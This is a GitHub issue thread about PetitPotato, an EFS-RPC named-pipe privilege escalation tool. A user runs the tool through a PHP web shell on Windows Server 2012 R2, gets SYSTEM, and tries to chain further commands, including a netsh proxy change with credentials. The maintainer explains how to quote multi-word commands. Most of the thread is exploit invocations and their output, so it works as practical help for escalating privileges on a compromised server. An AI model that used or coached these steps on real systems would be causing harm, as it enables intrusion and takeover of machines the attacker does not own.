### ISSUE TITLE
Cant execute some commands

### ISSUE THREAD

**Issue by S0me1-dev** [wh0Nsq/PetitPotato#2]
Hello! 
Windows Server 2012 R2 Datacenter Edition Windows NT build 9600
command over phpwebshell -
-------------------------------------------------------------------------------------------------------
$ testin.exe 3 whoami

[+] Malicious named pipe running on \\.\pipe\petit\pipe\srvsvc.
[+] Invoking EfsRpcQueryUsersOnFile with target path: \\localhost/pipe/petit\C$\wh0nqs.txt.
[+] The connection is successful.
[+] ImpersonateNamedPipeClient OK.
[+] OpenThreadToken OK.
[+] DuplicateTokenEx OK.
[+] CreateProcessAsUser OK.
nt authority\system

(! seems it work . Thanks a lot)
-------------------------------------------------------------------------------------------------------

but when i run 
testin.exe 3 whoami /priv
or testin.exe 3 netsh winhttp set proxy tester:password1@ip:port
i recieve -

$ testin.exe 3 whoami /priv

Usage: testin.exe [EfsID] [Command]

The available EfsIDs are as follows:
    [0] EfsRpcOpenFileRaw
    [1] EfsRpcEncryptFileSrv
    [2] EfsRpcDecryptFileSrv
    [3] EfsRpcQueryUsersOnFile
    [4] EfsRpcQueryRecoveryAgents
    [5] EfsRpcRemoveUsersFromFile (Failed)
    [6] EfsRpcAddUsersToFile
    [7] EfsRpcFileKeyInfo
    [8] EfsRpcDuplicateEncryptionInfoFile (Failed)
    [9] EfsRpcAddUsersToFileEx
    [10] EfsRpcFileKeyInfoEx (Failed)
    [11] EfsRpcGetEncryptedFileMetadata (Failed)
    [12] EfsRpcSetEncryptedFileMetadata (Failed)

**Comment by S0me1-dev** [comment]
Maybe something wrong with my syntax, and I need to ' or " whole commad. I was try -but have same result

**Comment by S0me1-dev** [comment]
if i try to + instead of  spaces i got

$ testin.exe 3 whoami+/priv

[+] Malicious named pipe running on \\.\pipe\petit\pipe\srvsvc.
[+] Invoking EfsRpcQueryUsersOnFile with target path: \\localhost/pipe/petit\C$\wh0nqs.txt.
[+] The connection is successful.
[+] ImpersonateNamedPipeClient OK.
[+] OpenThreadToken OK.
[+] DuplicateTokenEx OK.
[!] CreateProcessAsUser() failed, possibly due to missing privileges, retrying with CreateProcessWithTokenW().
[-] CreateProcessWithTokenW failed (2).

**Comment by wh0amitz** [comment]
> Hello! 
> 
> Windows Server 2012 R2 Datacenter Edition Windows NT build 9600
> 
> command over phpwebshell -
> 
> -------------------------------------------------------------------------------------------------------
> 
> $ testin.exe 3 whoami
> 
> 
> 
> 
> 
> [+] Malicious named pipe running on \\.\pipe\petit\pipe\srvsvc.
> 
> [+] Invoking EfsRpcQueryUsersOnFile with target path: \\localhost/pipe/petit\C$\wh0nqs.txt.
> 
> [+] The connection is successful.
> 
> [+] ImpersonateNamedPipeClient OK.
> 
> [+] OpenThreadToken OK.
> 
> [+] DuplicateTokenEx OK.
> 
> [+] CreateProcessAsUser OK.
> 
> nt authority\system
> 
> 
> 
> (! seems it work . Thanks a lot)
> 
> -------------------------------------------------------------------------------------------------------
> 
> 
> 
> but when i run 
> 
> testin.exe 3 whoami /priv
> 
> or testin.exe 3 netsh winhttp set proxy tester:password1@ip:port
> 
> i recieve -
> 
> 
> 
> $ testin.exe 3 whoami /priv
> 
> 
> 
> Usage: testin.exe [EfsID] [Command]
> 
> 
> 
> The available EfsIDs are as follows:
> 
>     [0] EfsRpcOpenFileRaw
> 
>     [1] EfsRpcEncryptFileSrv
> 
>     [2] EfsRpcDecryptFileSrv
> 
>     [3] EfsRpcQueryUsersOnFile
> 
>     [4] EfsRpcQueryRecoveryAgents
> 
>     [5] EfsRpcRemoveUsersFromFile (Failed)
> 
>     [6] EfsRpcAddUsersToFile
> 
>     [7] EfsRpcFileKeyInfo
> 
>     [8] EfsRpcDuplicateEncryptionInfoFile (Failed)
> 
>     [9] EfsRpcAddUsersToFileEx
> 
>     [10] EfsRpcFileKeyInfoEx (Failed)
> 
>     [11] EfsRpcGetEncryptedFileMetadata (Failed)
> 
>     [12] EfsRpcSetEncryptedFileMetadata (Failed)

Hello, your command parameter is wrong. If there is a space in the command, please wrap the command in quotation marks.
